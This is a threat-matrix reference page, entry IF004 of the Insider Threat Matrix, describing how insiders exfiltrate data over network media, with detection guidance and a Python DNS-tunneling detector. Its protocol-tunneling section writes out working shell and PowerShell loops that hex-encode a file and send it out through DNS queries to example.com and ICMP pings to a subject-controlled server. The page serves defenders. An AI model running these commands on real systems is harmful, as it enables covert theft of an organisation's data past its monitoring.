Insider Threat Matrix™
  • ID: IF004
  • Created: 31st May 2024
  • Updated: 22nd September 2024
  • Contributor: The ITM Team

Exfiltration via Other Network Medium

A subject exfiltrates files through a network. A network can be an Internet Protocol (IP) network or other technology enabling the communication of data between two or more digital devices.

Subsections (8)

IF004.002 Exfiltration via AirDrop

A subject exfiltrates files using AirDrop as the transportation medium.

IF004.008 Exfiltration via API

A subject may exfiltrate organizational data through direct interaction with application programming interfaces (APIs), leveraging HTTP/S-based service endpoints to transmit sensitive information outside of the organization’s controlled environment. This method typically involves programmatic data transfer using scripts, command-line tools, or software development kits (SDKs), rather than user-facing web interfaces.

In this infringement method, the subject authenticates to an external or unauthorized internal API using credentials such as API keys, OAuth tokens, or session tokens, and submits data via structured requests (e.g., POST, PUT). These APIs may belong to legitimate third-party services (e.g., cloud platforms, SaaS applications) or attacker-controlled infrastructure designed to receive and store exfiltrated data.

Unlike platform-driven exfiltration (e.g., uploading files via a web interface), API-based exfiltration is typically automated, scalable, and capable of operating without generating browser artifacts. This allows the subject to transfer large volumes of data, segment payloads across multiple requests, or embed exfiltration within otherwise legitimate application traffic.

This technique is particularly effective in environments where API traffic is common and trusted, and where inspection of request payloads, headers, or authentication patterns is limited.

IF004.001 Exfiltration via Bluetooth

A subject exfiltrates files using Bluetooth as the transportation medium.

IF004.003 Exfiltration via Personal NAS Device

A subject exfiltrates data using an organization-owned device (such as a laptop) by copying the data from the device to a personal Network Attached Storage (NAS) device, which is attached to a network outside of the control of the organization, such as a home network. Later, using a personal device, the subject accesses the NAS to retrieve the exfiltrated data.

IF004.005 Exfiltration via Protocol Tunneling

A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination.

DNS Tunneling (Linux)
A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:

Prerequisites:

  • A domain the subject controls or can use for DNS queries.
  • A DNS server to receive and decode the DNS queries.

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:

xxd -p secret.txt > secret.txt.hex

2. The subject splits the hex dump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

split -b 32 secret.txt.hex hexpart_

3. The subject uses dig to send the data in DNS TXT queries, looping through the split files and sending each chunk as the subdomain of example.com in a TXT record query:

for part in hexpart_*; do
   h=$(cat $part)
   dig txt $h.example.com
done

On the DNS server they control, the subject captures the incoming DNS TXT record queries and decodes the reassembled hex data from the subdomain of each query.

 

DNS Tunneling (Windows)
A simple example of how DNS tunneling might be achieved with PowerShell in Windows:

Prerequisites:

  • A domain the subject controls.
  • A DNS server, or a script on the subject's server, to capture and decode the DNS queries.

Steps:

1. The subject converts the sensitive file to hex:

$filePath = "C:\path\to\your\secret.txt"
$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''

2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

$chunkSize = 32
$chunks = $hexContent -split "(.{$chunkSize})" | Where-Object { $_ -ne "" }

3. The subject sends the data in DNS TXT queries, looping through the hex data chunks and sending each chunk as the subdomain of example.com in a TXT record query:

$domain = "example.com"

foreach ($chunk in $chunks) {
   $query = "$chunk.$domain"
   Resolve-DnsName -Name $query -Type TXT
}

The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of each query.
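Both DNS examples above leave the same trace in resolver logs: a burst of long, hex-only first labels under one parent domain from one client. The detector below is an added example written for this page, not tooling from the Insider Threat Matrix; it assumes a simple resolver log format of `<epoch> <client-ip> <qname> <qtype>` and runs over constructed sample lines embedded in the script.

```python
import re
from collections import defaultdict

# Constructed sample resolver log (not from the page): "<epoch> <client> <qname> <qtype>".
# Lines 2-4 and 6 mimic chunks of an xxd -p / BitConverter hex dump sent as labels.
SAMPLE_LOG = """\
1716000001 10.0.0.5 www.example.org A
1716000002 10.0.0.5 4d7920736563726574206e6f74657320.example.com TXT
1716000003 10.0.0.5 617265206865726520616e6420746865.example.com TXT
1716000004 10.0.0.5 79206172652076657279206c6f6e672e.example.com TXT
1716000005 10.0.0.7 mail.example.org MX
1716000006 10.0.0.5 0a6d6f72652073656372657473206865.example.com TXT
"""

# A DNS label is at most 63 characters; hex-encoded chunks are long and use only [0-9a-f].
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$", re.IGNORECASE)
MIN_SUSPECT_LABEL_LEN = 24  # tunable: shorter hex labels occur in legitimate CDN/cache-busting names


def parse_line(line):
    """Split one log line into its fields; qname is normalised to lower case without a trailing dot."""
    ts, client, qname, qtype = line.split()
    return {"ts": int(ts), "client": client, "qname": qname.rstrip(".").lower(), "qtype": qtype}


def looks_encoded(label):
    """True if a single label looks like a hex-encoded data chunk rather than a hostname."""
    return len(label) >= MIN_SUSPECT_LABEL_LEN and bool(HEX_LABEL.match(label))


def find_tunneling(log_text, min_queries=3):
    """Group encoded-looking queries by (client, parent domain) and flag any pair
    that has sent min_queries or more distinct such labels. Returns {(client, parent): count}.
    Distinct labels are counted because a tunnel never repeats a chunk, while a cached
    legitimate name is resolved repeatedly under the same label."""
    buckets = defaultdict(set)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        labels = rec["qname"].split(".")
        if len(labels) < 3:
            continue  # need at least <label>.<domain>.<tld> to have a data-carrying subdomain
        if looks_encoded(labels[0]):
            parent = ".".join(labels[-2:])
            buckets[(rec["client"], parent)].add(labels[0])
    return {key: len(subs) for key, subs in buckets.items() if len(subs) >= min_queries}
```

Only the first label is inspected here; a tunnel that spreads data across several labels per query would need the same check applied to every label left of the parent domain.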

 

ICMP Tunneling (Linux)
A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:

Prerequisites:

  • The subject has access to a server that can receive and process ICMP packets.
  • The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions).

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:

xxd -p secret.txt > secret.txt.hex

2. The subject splits the hex dump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks:

split -b 32 secret.txt.hex hexpart_

3. The subject uses ping to send the data in ICMP echo request packets, looping through the split files and sending each chunk as part of the ICMP payload:

DESTINATION_IP="subject_server_ip"
for part in hexpart_*; do
   h=$(cat $part)
   ping -c 1 -p "$h" $DESTINATION_IP
done

The subject will capture the incoming ICMP packets on the destination server, extract the data from the packets and decode the reassembled hex data.

IF004.006 Exfiltration via Python Listening Service

A subject may employ a Python-based listening service to exfiltrate organizational data, typically as part of a self-initiated or premeditated breach. Python’s accessibility and versatility make it a powerful tool for creating custom scripts capable of transmitting sensitive data to external or unauthorized internal systems.

In this infringement method, the subject configures a Python script—often hosted externally or on a covert internal system—to listen for incoming connections. A complementary script, running within the organization’s network (such as on a corporate laptop), transmits sensitive files or data streams to the listening service using common protocols such as HTTP or TCP, or via more covert channels including DNS tunneling, ICMP, or steganographic methods. Publicly available tools such as PyExfil can facilitate these operations, offering modular capabilities for exfiltrating data across multiple vectors.

Examples of Use:

  • A user sets up a lightweight Python HTTP listener on a personal VPS and writes a Python script to send confidential client records over HTTPS.
  • A developer leverages a custom Python socket script to transfer log data to a system outside the organization's network, circumventing monitoring tools.
  • An insider adapts an open-source exfiltration framework like PyExfil to send data out via DNS queries to a registered domain.

Detection Considerations:

  • Monitor for local Python processes opening network sockets or binding to uncommon ports.
  • Generate alerts on outbound connections to unfamiliar IP addresses or those exhibiting anomalous traffic patterns.
  • Utilize endpoint detection and response (EDR) solutions to flag scripting activity involving file access and external communications.
  • Inspect Unified Logs, network flow data, and system audit trails for signs of unauthorized data movement or execution of custom scripts.

IF004.004 Exfiltration via Screen Sharing Software

A subject exfiltrates data outside of the organization's control using the built-in file transfer capabilities of software such as TeamViewer.

IF004.007 Exfiltration via Windows BITS

A subject may leverage the Windows Background Intelligent Transfer Service (BITS) to exfiltrate organizational data in a covert and resilient manner. BITS is a native Windows component designed to transfer files asynchronously over HTTP or SMB, typically used by system processes such as updates and patch delivery. Its trusted status, ability to throttle bandwidth, and support for job persistence make it an attractive mechanism for stealthy data exfiltration.

In this infringement method, the subject creates or modifies a BITS job, either via native utilities (e.g., bitsadmin, PowerShell cmdlets) or custom tooling, to upload sensitive files to an external endpoint under their control. Transfers may be disguised as legitimate background activity, leveraging standard ports and protocols to blend with normal system traffic.

BITS jobs can persist across reboots, retry on failure, and operate with minimal user interaction, allowing the subject to stage and gradually exfiltrate data over extended periods. In some cases, the subject may combine BITS with obfuscation techniques, such as renaming payloads, encrypting data prior to transfer, or using subject-controlled infrastructure that mimics legitimate services.

This technique is particularly effective in environments where outbound traffic is loosely controlled and where native Windows services are implicitly trusted, reducing the likelihood of immediate detection.

Examples of Use:

  • A subject creates a BITS job using PowerShell to upload archived project files to an external HTTP server hosted on a personal VPS.
  • A subject schedules a recurring BITS transfer that periodically sends collected documents to a remote endpoint, using low bandwidth to avoid triggering alerts.
  • A subject modifies an existing BITS job to include additional file uploads to an attacker-controlled domain, blending activity with legitimate system update traffic.